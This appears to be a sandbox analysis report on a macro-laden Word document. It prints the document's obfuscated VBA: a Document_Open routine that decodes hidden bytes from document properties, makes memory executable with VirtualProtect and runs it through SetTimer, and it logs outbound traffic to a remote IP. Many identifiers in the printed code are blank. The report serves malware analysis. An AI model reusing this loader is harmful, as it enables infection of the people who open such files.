                                                                                                                                                      MD5:2992D726CEBB2BBB07315BCF73B645A6
                                                                                                                                                      SHA1:60198AF79AA2A8BC1A8641BF70B1431C0BE991FE
                                                                                                                                                      SHA-256:44B46EB18FE8D422F7C1744B58E2CA22415212E5054B6E573AE55E8C82ED1F2F
                                                                                                                                                      SHA-512:AE3815CB0302481405EED6A3E7710FDC86C9D6C99A4DB4877EB53179370F4ED206BD601C04BFEA16907B2AA87330F743A389EDE716603A3896AB88BEED0666E6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h..........C.).$...^.i@..iT..i`..iDB.iZR.i.C.).%..........T.......6C.......C.).&...........
                                                                                                                                                      File type:Zip archive data, at least v2.0 to extract
                                                                                                                                                      Entropy (8bit):7.993790073605077
                                                                                                                                                      TrID:
                                                                                                                                                      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                      • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                      File name:berniesbooksdocument08.11.doc
                                                                                                                                                      File size:2298836
                                                                                                                                                      MD5:2b10f2617b32857999df1cf5f19f0d8d
                                                                                                                                                      SHA1:448e513536aa0c576b123d5b243e1bdc6d261d6f
                                                                                                                                                      SHA256:3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47
                                                                                                                                                      SHA512:f99a1ffdb12b9fe4bc512f33ef98fa989312951fdbfc6aa8cc09d0725cbb90e2c11727dced788991e00087859054b273f09917d2fa3b52cd5be54ecd257dd85c
                                                                                                                                                      SSDEEP:49152:tIjQhPf8F7u26T076/JsKhCa8CCGEEt1yEU:WjufCre/1UMEEzyh
                                                                                                                                                      TLSH:73B533F8C2706D07F858D195355BEAF27960C6A2863B5EE9F275131BE139B1F4070B28
                                                                                                                                                      File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.
                                                                                                                                                      Icon Hash:74f4c4c6c1cac4d8
                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1
                                                                                                                                                      Has Summary Info:
                                                                                                                                                      Application Name:
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:True
                                                                                                                                                      Contains Workbook/Book Stream:False
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:False
                                                                                                                                                      Flash Objects Count:0
                                                                                                                                                      Contains VBA Macros:True
                                                                                                                                                      General
                                                                                                                                                      Stream Path:VBA/ThisDocument
                                                                                                                                                      VBA File Name:ThisDocument.cls
                                                                                                                                                      Stream Size:2850
                                                                                                                                                      Data ASCII:. J . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t i o n . . . . . . . . . . . L i b . " k e r n e l . 3 2 " A l i a . s " V i r t u . a l P r o t e c . t " ( B y V a . l . A s L o n g . 5 ,
                                                                                                                                                      Data Raw:01 4a b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
                                                                                                                                                      Attribute VB_Name = "ThisDocument"
                                                                                                                                                      Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                                                      Attribute VB_GlobalNameSpace = False
                                                                                                                                                      Attribute VB_Creatable = False
                                                                                                                                                      Attribute VB_PredeclaredId = True
                                                                                                                                                      Attribute VB_Exposed = True
                                                                                                                                                      Attribute VB_TemplateDerived = True
                                                                                                                                                      Attribute VB_Customizable = True
                                                                                                                                                      Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
                                                                                                                                                      Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
                                                                                                                                                      Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                          
                                                                                                                                                      Function (, Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                              Set  = GetObject()
                                                                                                                                                          Else
                                                                                                                                                              Set  = ((), )
                                                                                                                                                          End If
                                                                                                                                                          Set  = 
                                                                                                                                                          End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 7
                                                                                                                                                          End Function
                                                                                                                                                      Function (, )
                                                                                                                                                           = Mid(,  + 1, 1)
                                                                                                                                                      End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 5
                                                                                                                                                          End Function
                                                                                                                                                      Function (Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                               = Timer()
                                                                                                                                                          Else
                                                                                                                                                               = (())
                                                                                                                                                          End If
                                                                                                                                                           = 
                                                                                                                                                          End Function
                                                                                                                                                      Function (, Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                               = UBound()
                                                                                                                                                          Else
                                                                                                                                                               = ((), )
                                                                                                                                                          End If
                                                                                                                                                           = 
                                                                                                                                                          End Function
                                                                                                                                                      Function (Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                              Set  = ActiveDocument
                                                                                                                                                          Else
                                                                                                                                                              Set  = (())
                                                                                                                                                          End If
                                                                                                                                                          Set  = 
                                                                                                                                                          End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 9
                                                                                                                                                          End Function
                                                                                                                                                      Function (Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                              Set  = CallByName((tzNBn4nTiI("GHnGK3YWsN_G")), tzNBn4nTiI("IHLLXTW2lF"), VbGet, tzNBn4nTiI("hjoQUX7"))
                                                                                                                                                          Else
                                                                                                                                                              Set  = (())
                                                                                                                                                          End If
                                                                                                                                                          Set  = 
                                                                                                                                                          End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 8
                                                                                                                                                          End Function
                                                                                                                                                      Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
                                                                                                                                                          Select Case 
                                                                                                                                                                  Case ()
                                                                                                                                                                      Set  = (, True)
                                                                                                                                                                  Case ()
                                                                                                                                                                      Set  = (, True)
                                                                                                                                                                  Case ()
                                                                                                                                                                      Set  = (True)
                                                                                                                                                                  Case ()
                                                                                                                                                                      Set  = (True)
                                                                                                                                                                  Case ()
                                                                                                                                                                      Set  = (, True)
                                                                                                                                                                  Case ()
                                                                                                                                                                       = (, True)
                                                                                                                                                                  Case ()
                                                                                                                                                                       = (, True)
                                                                                                                                                                  Case ()
                                                                                                                                                                       = (, True)
                                                                                                                                                                  Case ()
                                                                                                                                                                       = (, True)
                                                                                                                                                                  Case ()
                                                                                                                                                                       = (, , True)
                                                                                                                                                                  Case ()
                                                                                                                                                                       = (True)
                                                                                                                                                                  Case ()
                                                                                                                                                                       = (, True)
                                                                                                                                                              End Select
                                                                                                                                                      End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 2
                                                                                                                                                          End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 6
                                                                                                                                                          End Function
                                                                                                                                                      Function (, Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                               = Len()
                                                                                                                                                          Else
                                                                                                                                                               = ((), )
                                                                                                                                                          End If
                                                                                                                                                           = 
                                                                                                                                                          End Function
                                                                                                                                                      Sub (w)
                                                                                                                                                          Dim  As Long
                                                                                                                                                          Dim  As Long
                                                                                                                                                           = () + ()
                                                                                                                                                          Do
                                                                                                                                                               = ()
                                                                                                                                                              DoEvents
                                                                                                                                                          Loop Until  > 
                                                                                                                                                      End Sub
                                                                                                                                                      Function (, Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                               = CDec()
                                                                                                                                                          Else
                                                                                                                                                               = ((), )
                                                                                                                                                          End If
                                                                                                                                                           = 
                                                                                                                                                          End Function
                                                                                                                                                      Function (, Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                               = VarPtr()
                                                                                                                                                          Else
                                                                                                                                                               = ((), )
                                                                                                                                                          End If
                                                                                                                                                           = 
                                                                                                                                                          End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 3
                                                                                                                                                          End Function
                                                                                                                                                      Function (, , Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                               = Mid(,  + 1, 1)
                                                                                                                                                          Else
                                                                                                                                                               = ((), , )
                                                                                                                                                          End If
                                                                                                                                                           = 
                                                                                                                                                          End Function
                                                                                                                                                      Function ()
                                                                                                                                                          #If Win64 Then
                                                                                                                                                               = True
                                                                                                                                                          #Else
                                                                                                                                                               = False
                                                                                                                                                          #End If
                                                                                                                                                      End Function
                                                                                                                                                      Public Function tzNBn4nTiI(strInput)
                                                                                                                                                              tzNBn4nTiI = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
                                                                                                                                                          End Function
                                                                                                                                                      Function ()
                                                                                                                                                          ReDim (() - 1) As Byte
                                                                                                                                                          Dim  As Long,  As Long
                                                                                                                                                          Dim :  = tzNBn4nTiI("NdP4AZL") & tzNBn4nTiI("muVOil0XYg2e")
                                                                                                                                                          For  = 0 To () - 1 Step 2
                                                                                                                                                               =  / 2
                                                                                                                                                              () = 255 - ( & (, ) & (,  + 1))
                                                                                                                                                          Next
                                                                                                                                                           = 
                                                                                                                                                      End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 0
                                                                                                                                                          End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 11
                                                                                                                                                          End Function
                                                                                                                                                      Function (, Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                               = ()
                                                                                                                                                          Else
                                                                                                                                                               = ((), )
                                                                                                                                                          End If
                                                                                                                                                           = 
                                                                                                                                                          End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 4
                                                                                                                                                          End Function
                                                                                                                                                      Function (, Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                              Set  = CallByName((), tzNBn4nTiI("ZhcGI4Fko"), VbGet, )
                                                                                                                                                          Else
                                                                                                                                                              Set  = ((), )
                                                                                                                                                          End If
                                                                                                                                                          Set  = 
                                                                                                                                                          End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 10
                                                                                                                                                          End Function
                                                                                                                                                      Private Sub Document_Open()
                                                                                                                                                          Dim () As Byte
                                                                                                                                                          If () Then
                                                                                                                                                               = ((tzNBn4nTiI("GTFEAXDy")).Value)
                                                                                                                                                          Else
                                                                                                                                                               = ((tzNBn4nTiI("daKoDigF")).Value)
                                                                                                                                                          End If
                                                                                                                                                          Dim  As LongPtr
                                                                                                                                                          Dim  As LongPtr
                                                                                                                                                          Dim  As LongPtr
                                                                                                                                                          Dim  As LongPtr
                                                                                                                                                           = () + 1
                                                                                                                                                           = VarPtr((0))
                                                                                                                                                           , , 64, VarPtr()
                                                                                                                                                                  ()(tzNBn4nTiI("WkOyJWJ")) = tzNBn4nTiI("AxRBGEJUCmoi1")
                                                                                                                                                               = (0, , 1, )
                                                                                                                                                           1
                                                                                                                                                           0, 
                                                                                                                                                          ().Remove (tzNBn4nTiI("OPHmxDl8d35"))
                                                                                                                                                          ().Remove (tzNBn4nTiI("FBwW10dy"))
                                                                                                                                                          ReDim (1)
                                                                                                                                                      End Sub
                                                                                                                                                      Function (, Optional  = False)
                                                                                                                                                          If  Then
                                                                                                                                                              Set  = CallByName((), tzNBn4nTiI("UuJ8TNV_S"), VbGet, )
                                                                                                                                                          Else
                                                                                                                                                              Set  = ((), )
                                                                                                                                                          End If
                                                                                                                                                          Set  = 
                                                                                                                                                          End Function
                                                                                                                                                      Function ()
                                                                                                                                                           = 1
                                                                                                                                                          End Function
                                                                                                                                                      

                                                                                                                                                      General
                                                                                                                                                      Stream Path:PROJECT
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Stream Size:365
                                                                                                                                                      Entropy:5.222695960979116
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:I D = " { 8 F B 1 3 C C 5 - 9 8 A 3 - 4 4 C 0 - B 6 5 D - D C 2 3 5 7 7 9 D E F 4 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 3 8 1 8 4 0 B 0 3 0 F 0 3 0 F 0 3 0 F 0 3 0 F " . . D P B = " 0 6 0 4 0 1 8 8 0 7 8 8 8 B 8 9 8 B 8 9 8 B " . . G C = " 8 9 8 B 8 E 9 3 8 F 9 3 8 F 6 C " . . . . [ H o s t E x t e n d e r I n f o ] . .
                                                                                                                                                      Data Raw:49 44 3d 22 7b 38 46 42 31 33 43 43 35 2d 39 38 41 33 2d 34 34 43 30 2d 42 36 35 44 2d 44 43 32 33 35 37 37 39 44 45 46 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                                                                                                      General
                                                                                                                                                      Stream Path:PROJECTwm
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:41
                                                                                                                                                      Entropy:3.0773844850752607
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                                                                                                      Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                                                                                                      General
                                                                                                                                                      Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                      File Type:ISO-8859 text, with no line terminators
                                                                                                                                                      Stream Size:7
                                                                                                                                                      Entropy:1.8423709931771088
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:a . . .
                                                                                                                                                      Data Raw:cc 61 ff ff 00 00 00
                                                                                                                                                      General
                                                                                                                                                      Stream Path:VBA/__SRP_2
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:5108
                                                                                                                                                      Entropy:1.9282501947973256
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` i < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                                                                                                                      General
                                                                                                                                                      Stream Path:VBA/__SRP_3
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:2724
                                                                                                                                                      Entropy:2.6851031014715843
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . ` . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . P . . . . . . . . . . . . 0 . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . \\ . . p . . . . . . ! . . . . . . . . . . . q . . . . . . . .
                                                                                                                                                      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 60 00 e1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 10 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                      General
                                                                                                                                                      Stream Path:VBA/dir
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:486
                                                                                                                                                      Entropy:6.2963537460893955
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . [ d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . + m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A
                                                                                                                                                      Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 2e 5b f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30
                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Aug 11, 2022 19:41:26.923190117 CEST4974280192.168.2.345.8.146.139
                                                                                                                                                      Aug 11, 2022 19:41:29.992841005 CEST4974280192.168.2.345.8.146.139
                                                                                                                                                      Aug 11, 2022 19:41:35.988784075 CEST4974280192.168.2.345.8.146.139

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:19:41:13
                                                                                                                                                      Start date:11/08/2022
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                      Imagebase:0xf00000
                                                                                                                                                      File size:1937688 bytes
                                                                                                                                                      MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Call Graph

                                                                                                                                                      • Entrypoint
                                                                                                                                                      • Decryption Function
                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      • Show Help
                                                                                                                                                      callgraph 1 Error: Graph is empty

                                                                                                                                                      Module: __Unknown_Module_Name__

                                                                                                                                                      Declaration
                                                                                                                                                      LineContent
                                                                                                                                                      Reset < >